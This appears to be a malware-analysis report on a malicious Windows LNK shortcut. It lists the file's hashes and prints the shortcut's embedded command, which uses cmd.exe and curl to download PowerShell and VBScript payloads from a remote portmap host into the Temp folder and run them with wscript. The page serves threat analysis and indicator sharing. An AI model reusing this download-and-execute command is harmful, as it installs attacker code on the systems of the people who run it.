Malicious
Malicious

4338a18353b1f303a94ac13041b8ec4b

LNK File
|
MD5: 4338a18353b1f303a94ac13041b8ec4b
|
Size: 1.74 KB
|
application/x-ms-shortcut

Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
4338a18353b1f303a94ac13041b8ec4b
Sha1
7499d0aff725a819b6be7e2be50dce44e6e02b56
Sha256
bf59c5c83431033fe0adc9f7ce14b4f86eff4f02a556a1558e426869a99e6afa
Sha384
f35aedc98d5d59d3b1934e9908c0d23a723f486fce32e3e2108196479cc1757cb867cf1544bfc76933c072dd28e63b85
Sha512
94129b449b6e7b3bd6eb2e3ebbb8df30cb8886357036b421318e2aa92d6f7c6d6b07f16d42e4066aa2104b1c3fe488cd8b4f539e82197fc874808089bfe732c7
SSDeep
48:8ZFlYJnifJfkKIwkJBn+dSyDKzld1Of2:8ZFmifJft8aDK9
TLSH
1131CB1672EE4335E3B30E3B6872A329063AFD47ED61EB2E1214478C1862310D964F7A
File Structure
4338a18353b1f303a94ac13041b8ec4b
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

cmd.exe /c curl -s -o C:\Windows\Temp\fate.ps1 http://tw-31304.portmap.host:31304/fate.ps1 && curl -s -o C:\Windows\Temp\fate.vbs http://tw-31304.portmap.host:31304/fate.vbs && wscript C:\Windows\Temp\fate.vbs
4338a18353b1f303a94ac13041b8ec4b (1.74 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙